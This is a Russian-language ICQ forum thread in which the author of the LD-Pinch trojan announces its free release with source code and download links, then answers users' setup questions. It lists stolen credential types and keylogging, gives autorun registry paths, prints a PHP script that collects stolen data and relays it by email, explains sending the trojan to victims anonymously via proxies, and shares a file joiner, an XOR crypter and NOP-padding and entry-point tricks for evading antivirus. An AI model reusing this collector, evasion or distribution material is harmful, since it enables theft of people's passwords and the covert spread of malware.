ICQ - форум. Всё про ICQ.  

Вернуться   ICQ - форум. Всё про ICQ. > ICQ > Разное об ICQ: уязвимости, защита, проблемы с паролем

Разное об ICQ: уязвимости, защита, проблемы с паролем Обсуждение самых основных вопросов, касающихся ICQ - советы, статьи по безопасности, особенности новых версий и фишек, ответы по поводу установки клиента и простейших настроек, другие темы, не имеющие отношения к продвинутой эксплуатации ICQ. Перестал подходить пароль к номеру ICQ? Вам помогут в этом разделе ;)

 
 
Опции темы Оценить тему
Старый 02.10.2003, 04:11   #1
Старпёр
 
Аватар для coban2k
 
Регистрация: 22.06.2003
Сообщений: 186

Репутация: 91
Pinch: лучший трой, теперь для всех!

Платный трой LD-Pinch, теперь раздается даром с конфигуратором и исходниками (а это более 150 кб чистого асма).

Посмотреть скриншоты, а также скачать сам трой можно здесь:
http://www.cobans.net/pinch.html

Напомню возможности троя, увод паролей:
- ICQ99b-2003a/2003b/Lite
- Miranda-icq
- Trillian ICQ&AIM
- &RQ
- The Bat!/The Bat!2 (mailer)
- Outlook/Outlook Express (pop3/imap)
- IE autocomplete & protected sites & ftp (9x/Me/2k/xp supported)
- FAR Manager (ftp)
- Win/Total Commander (ftp)
- RAS (поддерживается 9x/Me/2k/xp)
- System info: OS, memory, CPU, hard drives, logged user, host name, IP
- Key-log
- Remote console
- Посылка e-mail писем используя встроенный SMTP клиент
- Обход firewall'а
- Шифровка писем
- Самоудаление (optional)
- Отчеты в HTML/Text форматах
- Размер файла меньше 10кб
- Модульная система, при компиляции можно отключить некоторые модули, уменьшив тем самым размер выходного файла.

Наслаждайтесь релизом :)

В дополнению к пинчу: MicroJoiner -- клей для файлов, пока ничем не определяется, размер конфигуратора 7 кб, загрузчика 1024 байта (именно столько добавиться при склеивании файлов), цепляет иконки, может клеить картинки, pdf'ы, wav'ы и тд :)
http://www.cobans.net/joiner.html
__________________
Web: http://www.cobans.net

Последний раз редактировалось Keyptor; 18.02.2004 в 16:15.
coban2k вне форума  
Старый 02.10.2003, 14:58   #2
Старпёр
 
Аватар для coban2k
 
Регистрация: 22.06.2003
Сообщений: 186

Репутация: 91
По умолчанию

Цитата:
пасибо. а каковы причины? вроде кое кто у тебя покупал за денхи.
в последнее время трой почти не брали, свои деньги я получил, спасибо тем кто морально и материально позволил довести пинч до ума

Цитата:
и ещё ворпрос такой нам чё теперь всем пересаживаться на мозиллу
это дело каждого, советую закрыть IE в фаере, т.к. именно через него сейчас происходит больше всего атак на обычных пользователей (посредством дыр)

Цитата:
Жалко тока что от dial-up' a не шлет
отсылает, но не на 100%, там нужно доработать только часть расшифровки в дельфе, сам трой высылает инфу правильную но т.к. формат буффера в котором содержится пасс от RAS'а пока неясен, то вытянуть пароль оттуда можно невсегда.

Цитата:
так этот трой тока на мэйл мона посылать?? а если через аську хочу???
Слишком большие сообщения, можно слать на мыло, веб или скидывать в файл.

Цитата:
coban2k, я чёт не монял с вэбом...как он туда скинет без паса к руту? или чёт я ваще не о том....объясните..
Передается шифрованный текст через POST параметры, используя спрятанное окно IE.

Цитата:
действительно катастрофически не хватает кражи Dial-up из win2000/XP :-(
кому не лень присылайте шифрованные письма на coban2k@mail.ru где не находит dialup и я исправлю, пароль в любом случае там хранится.

Цитата:
У меня в системе стоят (и работают) вде миранды - пинч с одной пароль послал - а другую не заметил... к чему бы это... Я ставил сначала одну миранду, позже поставил другую, но в другую директорию. С новой пароль отправился....
миранда путь прописывает в реестре который я и читаю, если несколько миранд то путь будет только от одной из них :) имхо, нецивильно сканить весь винчестр на наличие дат-файлов.

Цитата:
вроде не ставил галочку самоудаления, а вот только по оддному репорту пришло...
если не поставил галочку Act as Trojan то больше ничего не прийдет, также одинаковые пассы не высылаются (проверка после каждой перезагрузки компа).

Цитата:
Антивири и антирояны его не видят - а вручную как? Где он себя прописывает?
1. Автозапуск:
HKEY_CURRENT_USER\Software\Mic rosoft\Windows\CurrentVersion\ Run <putil>

2. Тут инфа проверки на повторную отсылку пассов (если снести будет посылать все заново):
HKEY_CURRENT_USER\Software\Int el <Data>

3. Сам exe-шник:
Папка виндов\Название троя.exe

4. Файлы кейлога:
Папка виндов\plog

Цитата:
тока бы пару фкункций приделать
исходники в твоем распоряжении, приделывай все что хочешь :)

Цитата:
А мне всётаки не понятно,почему запустив трояна через DCOM дыру приходят тока системная инфа и фсё
DCOM получает левые права, поэтому многие части реестра которые требуются пинчу недоступны, и как следствие пассы не находятся :)

Цитата:
как иконку поменять у этого трояна?
похоже я где-то пути не исправил, потому как иконка компиляется только у меня :)
Попробуйте распаковать трой в папку C:\Program Files\Borland\Delphi6\Projects \Pinch\

Цитата:
dOink, i chemu ti radueshsya?
coban vipustit novuu versiu!!!
TO COBAN: kak sdelat chtobi pincha ne lovil AVP?
Бесплатных версий больше не будет, кому интересно пусть доделывает сам %)

P.S. для седя я уже давно шифранул экзешник, так что его никакой антивирь не видит.

Цитата:
обьясни пожалуйста подробно как сделать чтоб он слал через HTTP
Тут кроме меня на форуме вроде еще кто-то интересовался
Выбираешь протокол HTTP (снизу), потом в поле URL (закладка HTTP) пишешь полный линк к view.php на своем сайте (вроде www.aaa.com/f/view.php), прописываешь в закладке SMTP свое мыло, жмешь кнопку compile и тестируешь. Имей в виду что пинч дважды одни и теже пароли не высылает, если тестируешь меняй свой пасс на асе или мыле и тестируй снова.

Цитата:
Народ, как вообще этого троя отправить? если например продвинутый с точки зрения безопасности компа и никакой ехе.шник, пришедший по почте, ни в жисть не откроет?
Но даже если я его отшлю, и даже если не со своего ящика, то все равно есть проблема: у меня выделенка, => ip у меня статичный.. в аське его видно, а я не хочу, чтобы чел узнал, от кого трой.. Как поступить?
В оперу заходишь, настройки->сеть->прокси серверы.
вводишь проксю, и заходишь на mail.ru
шлешь письмо, прикрепляешь троян и шлешь :)

или качаешь SocksCap, запускаешь Outlook и шлешь через socks5

Цитата:
как иконку поменять у этого трояна?
Используй Microangelo98 или

Sources\PinchBuilder\Main.Pas отрываете:
ищете строчку с коментом // RSRC.RC
далее идет: S := '// Auto-gen и т.д.
удаляете все до знака ;
и пишете:



code:--------------------------------------------------------------------------------
S := '// Auto-generated file, can be deleted...'#13#10#13#10 +
'MAINICON ICON "' + IconPathEdit.Text + '"'#13#10;
--------------------------------------------------------------------------------

и все :)
потом компиляете билдер и все :)
для тех у кого нету делфей - юзайте Resrorator и прочие тулзы, и создаете ресурс с именем MAINICON (тип значок) и запихиваете свой значок.

Цитата:
вопрос по HTTP
что должно быть в view.php ?
что делать если сервер (бесплатный хостинг) не поддерживает SMTP?
и, наконец идея:
можно ли сделать так, чтобы трой отправлял инфу скрипту через QUERY_STRING а тот в свою очередь эту QUERY_STRING писал бы в файл на сервер?
все можно главное чтобы руки некривые были :)
<?
list($to,$subj,$body) = array($_POST['a'],$_POST['b'],$_POST['c']);
if ($f = fsockopen("mx3.mail.ru",25)) {
$msg = 'HELO adm@root.com\n'.
'MAIL FROM:<pinch@pinch.ru>\n'.
'RCPT TO:<$to>\n'.
'DATA\n'.
'$body\n.'.
'quit\n\n';
fputs($f,$msg);
}
fclose($f);
/* запись в файл */
$f = fopen('log.txt','a');
fputs($f,'$data\n--------------------------------------------\n');
fclose($f);
?>

<!-- REQUIRED -->
<script language="JavaScript">
window.status = "_ret_ok_1";
</script></body></html>

Цитата:
подскажите как расшифровать письмо присаное от Pinch
Вместе с пинчем идет программа Parser.exe
Копируешь текст письма и вставляешь туда. Или прямо в пинч билдере(закладка decrypt).


__________________
Web: http://www.cobans.net

Последний раз редактировалось Keyptor; 15.03.2004 в 21:10.
coban2k вне форума  
Старый 06.10.2003, 18:52   #3
Старпёр
 
Аватар для coban2k
 
Регистрация: 22.06.2003
Сообщений: 186

Репутация: 91
По умолчанию

Еще, народ, настраивайте трой внимательнее, а то ко мне постоянно приходят то тесты то пароли ваши %)
__________________
Web: http://www.cobans.net
coban2k вне форума  
Старый 27.11.2003, 06:40   #4
Участник
 
Аватар для Archie
 
Регистрация: 17.01.2003
Сообщений: 34

Репутация: 1
По умолчанию

http://zuluhotel.ru/pinch.zip
с ихсодниками. удалять пока не буду.
Archie вне форума  
Старый 01.03.2004, 15:26   #5
Участник
 
Регистрация: 08.02.2004
Сообщений: 7

ICQ: 1437239

Репутация: 1
Шифратор для пинча

"Ну че, дети, как там в интернете?
В чатах сидите? Гадите в сети?"

Наконец-то наступил первый день весны - 1 марта! Зима потихоньку отступает…
У Феликса сегодня ДР. Ты его, скорее всего, не знаешь, но могу поручиться, что веселый человек, очень хороший и надежный друг. На него можно положиться. С днюхой, Феликс!
В связи с тем, что в этот день столько всего хорошего, то сделаю этот день еще на капельку лучше. Ты можешь скачать шифровщик для пинча. Шифровальщик действует очень примитивно - просто часть кода XOR-ится определенным байтом. Аверы, конечно вскоре просекут эту фишку, но ты можешь поменять байт зашифровки. Как? Почитай readme - я его не просто так писал. Сам шифровщик написан с помощью RadAsm и masm32(куды без него?). Пароль на архив "asechka[dot]ru"
Исходники могу выслать. Для этого пошли мне запрос на мыло antiavp[am]mail[dot]ru.



Наверно, напоследок скажу: не стоит ничего делать просто так. Во всем должен быть смысл. Если бы не ДР - хрен бы я писал этот криптер :) Так что не ломайте ничего только для того, что бы сломать.

"Ладно, надоело, я кончаю, ребятки
Я надеюсь, детки, что у вас все в порядке..."
(c) кирпичи.
__________________
music makes a people come together
diov вне форума  
Старый 01.03.2004, 15:34   #6
Участник
 
Регистрация: 08.02.2004
Сообщений: 7

ICQ: 1437239

Репутация: 1
По умолчанию

Проверено AVP - вирусов нет!
Вложения
Тип файла: zip crypt.zip (6.9 Кб, 870 просмотров)
__________________
music makes a people come together

Последний раз редактировалось diov; 03.03.2004 в 00:38.
diov вне форума  
Старый 12.03.2004, 17:50   #7
Администратор
 
Регистрация: 01.01.1970
Сообщений: 1,334

ICQ: 222222

Twitter
По умолчанию

Цитата:
Первоначальное сообщение от ZLOST
Ineon, все можно главное чтобы руки некривые были :)
<?
list($to,$subj,$body) = array($_POST['a'],$_POST['b'],$_POST['c']);
if ($f = fsockopen("mx3.mail.ru",25)) {
$msg = 'HELO adm@root.com\n'.
'MAIL FROM:<pinch@pinch.ru>\n'.
'RCPT TO:<$to>\n'.
'DATA\n'.
'$body\n.'.
'quit\n\n';
fputs($f,$msg);
}
fclose($f);
/* запись в файл */
$f = fopen('log.txt','a');
fputs($f,'$data\n--------------------------------------------\n');
fclose($f);
?>

<!-- REQUIRED -->
<script language="JavaScript">
window.status = "_ret_ok_1";
</script></body></html>
Не работает в текстовый документ сохраняет строку
$data\n--------------------------------------------\n и все? Где ж ошибка? Подскажите плиз
net вне форума  
Старый 13.03.2004, 06:14   #8
Участник
 
Регистрация: 08.02.2004
Сообщений: 7

ICQ: 1437239

Репутация: 1
По умолчанию

Попробуй вместо $data написать $body.

Хостинг h11.ru поддерживает запись в файл, так что можно легко размещать этот скрипт там. На мыло пароли слаться не будут - у них баннеры...
__________________
music makes a people come together

Последний раз редактировалось diov; 13.03.2004 в 06:16.
diov вне форума  
Старый 14.03.2004, 19:55   #9
Участник
 
Аватар для Ice Cube
 
Регистрация: 21.10.2003
Сообщений: 98

ICQ: 983145

Репутация: 1
Отправить сообщение для Ice Cube с помощью AIM Отправить сообщение для Ice Cube с помощью MSN Отправить сообщение для Ice Cube с помощью Yahoo
По умолчанию

Что то последние время не могу даже тестовое сообщение послатьб пишет can't connect to the server или mailbox name not allowed пробывал со многих серверов и ящиков.
__________________
Была бы жопа, а геморой найдется!
Ice Cube вне форума  
Старый 23.03.2004, 15:07   #10
Администратор
 
Регистрация: 01.01.1970
Сообщений: 1,334

ICQ: 222222

Twitter
Smile

Цитата:
Первоначальное сообщение от diov
Проверено AVP - вирусов нет!

забавно ;)
Миниатюры
Нажмите на изображение для увеличения
Название: snap.jpg
Просмотров: 886
Размер:	53.8 Кб
ID:	913  
net вне форума  
Старый 23.03.2004, 22:54   #11
Участник
 
Аватар для Archie
 
Регистрация: 17.01.2003
Сообщений: 34

Репутация: 1
По умолчанию

Цитата:
Первоначальное сообщение от zK0rN
забавно ;)
Дружище... там есть сырцы, бери, компиль...
Я посмотрю на тебя, когда твоя же Панда снова ругнётся на твой же скомпиленный екзешник Парсера допустим.
Все антивирусы кричат на серверные программы троянов etc.
Archie вне форума  
Старый 30.03.2004, 13:38   #12
Участник
 
Регистрация: 24.03.2004
Сообщений: 31

Репутация: 0
По умолчанию

а где мне можно найти документацию полную на русском языке??
а то был на сайте многоуважаемого coban`a, скачал трой, и ни ухом не рылом не пойму, что с ним делать!
FurA вне форума  
Старый 30.03.2004, 13:51   #13
Участник
 
Аватар для Mister
 
Регистрация: 01.10.2003
Сообщений: 104

ICQ: 334010

Репутация: 3
По умолчанию

FurA,
Вот ты кадр, тут описаны все, ну или почти все функции трояна, прочитай внимательно.
__________________
Миру - Мир !!! Peace - Да !!!
Mister вне форума  
Старый 02.04.2004, 05:30   #14
Администратор
 
Регистрация: 01.01.1970
Сообщений: 1,334

ICQ: 222222

Twitter
По умолчанию

народ подскажите луче как перевести процедуры вытаскивания паролей из ассемблера в делфу ...в Pinch всё как то хитро сделано ???
net вне форума  
Старый 03.04.2004, 19:34   #15
Старпёр
 
Аватар для Keyptor
 
Регистрация: 27.12.2002
Сообщений: 202

Репутация: 52
По умолчанию

DDFit, есть раздел по программированию...
Keyptor вне форума  
Старый 04.04.2004, 01:42   #16
Администратор
 
Регистрация: 01.01.1970
Сообщений: 1,334

ICQ: 222222

Twitter
По умолчанию

Трой хороший жаль антивирь ловит !
net вне форума  
Старый 21.04.2004, 18:23   #17
Участник
 
Аватар для Igorek
 
Регистрация: 25.02.2004
Сообщений: 18

ICQ: 672912

Репутация: 1
По умолчанию

А чтобы создать сам файл, который надо отправить жертве, достаточно создать его PinchBuild'erom?
__________________
Да, за 5 лет ничего не поменялось...))
Igorek вне форума  
Старый 21.04.2004, 19:59   #18
Участник
 
Аватар для Aljoxa
 
Регистрация: 15.02.2004
Сообщений: 27

ICQ: 100234

Репутация: 17
По умолчанию

Igorek,
Цитата:
А чтобы создать сам файл, который надо отправить жертве, достаточно создать его PinchBuild'erom?
..ДА
Aljoxa вне форума  
Старый 04.10.2004, 00:08   #19
Участник
 
Аватар для ven000m
 
Регистрация: 27.12.2002
Сообщений: 249

Репутация: 6
По умолчанию

никто не чего не прикрывал, трафик там копеечный
посмотрим, будет кто-нибудь эту тему покупать, если можно бесплатно залить на хостинг к какому-нибудь другу и пользоваться
ven000m вне форума  
Старый 04.10.2004, 00:20   #20
Администратор
 
Регистрация: 01.01.1970
Сообщений: 1,334

ICQ: 222222

Twitter
По умолчанию

Я слышал вроде как должна вторая версия появиться ?
и кода она ожидатся?
net вне форума  
Старый 04.10.2004, 00:49   #21
Старпёр
 
Аватар для coban2k
 
Регистрация: 22.06.2003
Сообщений: 186

Репутация: 91
По умолчанию

~vo0D0o~, по некоторым веским причинам разработка пинча-2 была отложена на неопределенное время, доступны исходники реализованной части на http://pinch.ccteam.ru
В ближайшее время будет апгрейд парсера (для P2) (добавятся некоторые опции и возможности фильтрации/экспорта), до продолжения работы над сервером и конфигуратором руки дойдут очень нескоро, если вообще когда-то дойдут.
__________________
Web: http://www.cobans.net
coban2k вне форума  
Старый 04.10.2004, 09:40   #22
Старпёр
 
Аватар для Keyptor
 
Регистрация: 27.12.2002
Сообщений: 202

Репутация: 52
По умолчанию

всеравно респект... =)
Проэкт то всеравно развивается - хоть и не так быстро как хотелось другим =)
Keyptor вне форума  
Старый 05.10.2004, 05:22   #23
Администратор
 
Регистрация: 01.01.1970
Сообщений: 1,334

ICQ: 222222

Twitter
По умолчанию

Цитата:
по некоторым веским причинам разработка пинча-2 была отложена на неопределенное время
ничё сами доделали

Последний раз редактировалось БУМЕР; 05.10.2004 в 05:25.
net вне форума  
Старый 09.10.2004, 02:47   #24
Участник
 
Регистрация: 09.10.2004
Сообщений: 9

ICQ: 5895544

Репутация: 1
По умолчанию

Цитата:
Первоначальное сообщение от Alksoft
У меня что-то УРЛ не открывается :(
http://www.wmbuy.ru/Pinch.rar
__________________
shine shine shine
shine вне форума  
Старый 09.10.2004, 12:15   #25
Участник
 
Аватар для LuiCifer
 
Регистрация: 06.10.2004
Сообщений: 18

Репутация: 1
По умолчанию

У меня AVP определяет его как вирус. Че надо сделать(если возиожно) чтоб он не определял его как вирус?

LuiCifer добавил [date]1097312066[/date]:

Да и возможно ли его прикрепить к другим файлам?
LuiCifer вне форума  
Старый 12.10.2004, 07:46   #26
Участник
 
Аватар для Disabled
 
Регистрация: 12.10.2004
Сообщений: 18

ICQ: 881878

Репутация: 2
По умолчанию

Это, тама ссылка сдохла на первой странице :(
coban2k, можешь где нить выложить?
Disabled вне форума  
Старый 12.10.2004, 09:45   #27
Участник
 
Аватар для Crv_
 
Регистрация: 07.10.2004
Сообщений: 459

ICQ: 400450

Репутация: 4
По умолчанию

Nuphonik, см. пост #27
Crv_ вне форума  
Старый 12.10.2004, 11:03   #28
Участник
 
Аватар для [sER]
 
Регистрация: 28.03.2004
Сообщений: 109

ICQ: 267655

Репутация: 1
По умолчанию

Nuphonik,LuiCifer and other
этой теме уже год. надо смотреть дату постов. Уже выходили и понч про, и пинч 2, и другие моды, были кучи топиков на других сайтах как прятать и модифицировать трой. Были написаны кучи прог, но из за крыс которые стучат в супорты каспера и веба все их быстро прикрывают. Складывается пакая ситуация , что в скором времени вообще люди пишущие софт подобной тематики перестанут что-либо выкладывть(некоторые уде так и делают). И я их пойму, так как они тратят своё время и силы, а из-за крыс на форумах и не только всё прикрывают.
з.ы.: Знаю способ как зашарить пинч, но выклдывать не буду. Кто ищет, тот всегда найдёт!
[sER] вне форума  
Старый 13.10.2004, 17:51   #29
Участник
 
Аватар для LuiCifer
 
Регистрация: 06.10.2004
Сообщений: 18

Репутация: 1
По умолчанию

Спасибо что все разъяснил :)
ЗЫ: будем искать...
LuiCifer вне форума  
Старый 21.10.2004, 00:12   #30
Участник
 
Аватар для Nucleo
 
Регистрация: 07.10.2004
Сообщений: 68

По умолчанию

Ни у кого нет чистяка?
Nucleo вне форума  
Старый 21.10.2004, 13:39   #31
Участник
 
Регистрация: 30.10.2003
Сообщений: 19

Репутация: 1
По умолчанию

у меня был , но уже палится как 5 дней... :(
Mega_GnoM вне форума  
Старый 22.10.2004, 00:19   #32
Участник
 
Аватар для Nucleo
 
Регистрация: 07.10.2004
Сообщений: 68

По умолчанию

Mega_GnoM, отошли плиз на menalrein at mail dot ru.
подойдет.
Nucleo вне форума  
Старый 23.10.2004, 15:42   #33
Участник
 
Аватар для fearless
 
Регистрация: 03.01.2004
Сообщений: 305

ICQ: 666688

Репутация: 6
По умолчанию

[sER],
научи прятать =)
fearless вне форума  
Старый 24.10.2004, 01:55   #34
Администратор
 
Регистрация: 01.01.1970
Сообщений: 1,334

ICQ: 222222

Twitter
По умолчанию

nop ставь.......
net вне форума  
Старый 24.10.2004, 13:02   #35
Участник
 
Аватар для fearless
 
Регистрация: 03.01.2004
Сообщений: 305

ICQ: 666688

Репутация: 6
По умолчанию

БУМЕР,
про ведь тоже палится...
fearless вне форума  
Старый 24.10.2004, 13:57   #36
Участник
 
Аватар для Crv_
 
Регистрация: 07.10.2004
Сообщений: 459

ICQ: 400450

Репутация: 4
По умолчанию

fearless, что ПРО? Версия пинча? Бумер говорит про "nop", это такой "оператор" в ассемблере, который ничего не делает, опкод которого равер 90h. Нужно просто вставить его в "нужное" (пустое) место в exe'шнике. Чем, как и куда, объяснять не буду, про ЭТО написано уже достаточно статей, пойщи просто ;)
P.s А разве простой nop обманывает, допустим, Каспера? Например, дописывание в конец секции кода (в пустое место, если оно там есть) кода, типа
mov eax, REAL_EP_ADDRESS
jmp eax
легко палится тем же Каспером... (ну, естественно, EP перенесён на этот код :))
Crv_ вне форума  
Старый 24.10.2004, 14:06   #37
Участник
 
Аватар для fearless
 
Регистрация: 03.01.2004
Сообщений: 305

ICQ: 666688

Репутация: 6
По умолчанию

Crv_,
загон =)
fearless вне форума  
Старый 24.10.2004, 14:43   #38
Старпёр
 
Аватар для coban2k
 
Регистрация: 22.06.2003
Сообщений: 186

Репутация: 91
По умолчанию

Цитата:
который ничего не делает, опкод которого равер 90h.
На самом деле nop кое-что делает, nop = mov ax, ax (90h)

nop'ы можно вставлять как мусор, т.к. каспер определяет вирус/не вирус по нескольким кускам в .exe -- сигнатурам, если места этих кусков изменятся, либо сами куски не совпадут с контрольными суммами каспера, тогда получится чистяк =)
__________________
Web: http://www.cobans.net
coban2k вне форума  
Старый 25.10.2004, 02:53   #39
Участник
 
Аватар для Crv_
 
Регистрация: 07.10.2004
Сообщений: 459

ICQ: 400450

Репутация: 4
По умолчанию

Цитата:
Первоначальное сообщение от coban2k
На самом деле nop кое-что делает, nop = mov ax, ax (90h)
Хм. Не знал. Просто где бы не прочитал про nop, везде пишут, что мол "ничего не делает". Кстати, а где написано, что делается mov ax, ax??? Или это выведено экспериментальным путём? (у Юрова написано, что есдинственное, что делает nop - это увеличение регистра EIP)

Цитата:
Первоначальное сообщение от coban2k
nop'ы можно вставлять как мусор, т.к. каспер определяет вирус/не вирус по нескольким кускам в .exe -- сигнатурам, если места этих кусков изменятся, либо сами куски не совпадут с контрольными суммами каспера, тогда получится чистяк =)
Как ни пробовал "намусорить" nop'ами, всё не получалось ... Может, не так пробовал? :) А вот сделать тоже самое, вот таким "классическим" кодом - пожалуйста (с переносом EP на этот "кусок"):

prefetcht0 ; OF 18 h
mov eax, OEP
jmp eax

В принципе, можно вместо prefetcht'а использовать некоторые (все, конечно, не пробовал :)) другие операторы сопроцессора. Но да вот беда, они могут не поддерживаться на некоторых старых процессорах...

Вобщем, придумать можно много всего, главное, чтобы места хватило (00 байтов)...

Цитата:
Первоначальное сообщение от fearless
Crv_,
загон =)
В смысле?
Crv_ вне форума  
Старый 28.10.2004, 00:40   #40
Участник
 
Аватар для Nucleo
 
Регистрация: 07.10.2004
Сообщений: 68

По умолчанию

Не подскажите места куда nop вставлять?
Nucleo вне форума  
 

Опции темы
Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 04:44.


Перевод: zCarot
Форум Асечников © Asechka.RU

Новости Сочи